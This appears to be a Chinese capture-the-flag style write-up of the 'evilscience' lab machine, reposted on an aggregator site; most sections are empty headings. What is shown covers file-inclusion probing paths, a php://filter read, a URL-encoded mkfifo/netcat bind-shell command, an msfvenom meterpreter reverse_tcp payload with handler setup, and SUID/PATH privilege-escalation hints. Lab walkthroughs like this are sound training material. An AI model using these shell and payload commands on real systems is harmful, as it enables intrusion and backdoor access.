栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

靶机记录(十二):evilscience

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

靶机记录(十二):evilscience

目录

主机发现

端口扫描

SSH尝试连接

Web渗透

漏洞挖掘

GetShell 

 法一

 法二(MSF)

 提权

 法一(失败了)

 法二(脏牛,也失败了。。)​​​

 法三

 法四

 法五

 flag

清痕迹,留后门


主机发现

端口扫描

 

 SSH尝试连接

 

Web渗透

漏洞挖掘

试试其他的路径 :

/var/log/apache2/access.log
/var/log/apache/access.log     -----WEB 日志文件
/var/www/log/access.log 

                                全失败

尝试读取以下配置文件 :

/etc/apache2/apache2.conf       失败



尝试伪协议读取:
file=php://filter/convert.base64-encode/resource=index.php    失败

PHP伪协议读取试试也是失败的

 由于开了22,80,web日志不行,看一下 SSH 日志

 

GetShell 

 法一
依次执行

mkfifo /tmp/t
编码:mkfifo+/tmp/t

cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;

 

 

 法二(MSF)
生成木马脚本:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set lhost 攻击机IP
set lport 攻击机端口号
run

 

 

 提权

 法一(失败了)

在靶机上下载后 解析的时候都失败了  -> 啥也不是

 法二(脏牛,也失败了。。)

 

 法三

 

这个文件 而这个文件是具有s权限的  
!!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH

 

 

 法四

 

 法五

 

 

 flag

 

清痕迹,留后门

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/360850.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号